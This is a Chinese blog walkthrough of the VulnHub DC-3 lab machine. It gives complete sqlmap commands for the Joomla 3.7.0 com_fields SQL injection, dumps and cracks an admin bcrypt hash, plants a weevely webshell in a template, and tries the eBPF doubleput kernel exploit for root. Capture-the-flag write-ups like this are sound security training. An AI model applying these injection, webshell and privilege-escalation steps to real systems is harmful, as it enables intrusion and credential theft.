当前位置: 首页 > article >正文

vulnhub靶场 DC-3

地址:
https://download.vulnhub.com/dc/DC-3-2.zip
开启NAT模式
namp只扫到了一个端口
在这里插入图片描述

打开网页有一个登录的页面
目录扫描一下,可以找到一个 后台登录界面在这里插入图片描述

看一下指纹信息
在这里插入图片描述
joomla cms
网上搜一下可以发现存在一个JoomScan工具
在kali上面安装一下
apt install joomscan

joomscan -u 扫一下, 发现它的版本为3.7.0
在这里插入图片描述

网上搜一下, 发现存在sql注入的漏洞

利用kali上面的工具
searchsploit joomla 3.7
在这里插入图片描述
找到这个漏洞文件, 照着sqlmap打, 换一下host
在这里插入图片描述

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

查表

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

在这里插入图片描述

查列名

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

在这里插入图片描述

查看数据

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

在这里插入图片描述得到的密码是经过加密的, 用john爆破一下
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
放到1.txt中, 然后爆破
jonh 1.txt 得到密码: snoopy
在这里插入图片描述

用之前扫到的后台路径, 可以登录进去
在这里插入图片描述

再模板里面可以新建文件, 可以上传文件, 也可以直接更改文件的代码
使用weevely生成一个木马
https://blog.csdn.net/qq_45521281/article/details/106587791
在这里插入图片描述

将木马插入到index.php里面去
在这里插入图片描述

使用weevely进行连接weevely "http://192.168.75.135/index.php?tp=1&templateStyle=4" 1
在这里插入图片描述
其实也可以直接新建一个比如 1.php
然后写上一句话马, 或者反弹shell啥的,
访问到这个目录 /templates/beez3/1.php也就能够连上了
(我就是不知道如何找到这个目录的,有点懵)
连上去后, 权限比较低, 需要提权

看看是否有suid提权
find / -user root -perm -4000 -print 2>/dev/null
但是没找到可以用的
在这里插入图片描述

uname -a 看看系统信息, 看看内核版本在这里插入图片描述看看系统版本 cat /etc/*-release
在这里插入图片描述

找找这个版本是否存在一些漏洞

searchsploit ubuntu 16.04
在这里插入图片描述看到39772.txt
在这里插入图片描述访问相应的url, 下载到shell上面(一个39772.zip文件)
在这里插入图片描述

unzip 39772.zip   #解压
cd 39772
tar -xvf exploit.tar   # 解压

前面的文件下载那里是给了使用的教程的
在这里插入图片描述

cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

不知道为啥, 好像没有用
在这里插入图片描述

拿蚁剑连了一下, 重新上传了一下zip文件也是一样的, 不知道为啥
在这里插入图片描述

我看别人也是这个一样的回显啊, 咋别人就成root了, 我这就不行呢?
在这里插入图片描述

参考文章:
https://www.cnblogs.com/1-Ry/p/15075074.html
https://www.cnblogs.com/shadowink/p/14730761.html


http://www.kler.cn/a/312679.html

相关文章:

  • 【JavaEE进阶】导读
  • C语言第十一周课——函数的调用
  • Vue中优雅的使用Echarts的三种方式
  • 力扣 LeetCode 27. 移除元素(Day1:数组)
  • Java API类与接口:类的转换方法与正则表达式
  • 使用Matlab神经网络工具箱
  • axios二次封装
  • web基础—dvwa靶场(十二)JavaScript Attacks
  • 从数据到资产:企业数据治理经济价值实现的策略框架
  • Dubbo SPI源码
  • Linux 开发工具(vim、gcc/g++、make/Makefile)+【小程序:进度条】-- 详解
  • 新媒体运营
  • 非守护线程会阻止JVM的终止吗
  • 大联大诠鼎集团推出基于联咏科技、思特威和TDK产品的电子防抖(EIS)摄像头方案
  • 面试复盘与 AI 大模型学习
  • BitLocker硬盘加密的详细教程分享
  • 【简单点】docker如何部署tomcat
  • 3. Internet 协议的安全性
  • 1.4 计算机网络的性能指标
  • 【JAVA开源】基于Vue和SpringBoot的校园美食分享平台
  • Linux创建快捷命令
  • 经纬度计算距离方法
  • Git:版本控制工具介绍
  • 【busybox记录】【shell指令】timeout
  • Flink 与 Kubernetes (K8s)、YARN 和 Mesos集成对比
  • HarmonyOS元服务与卡片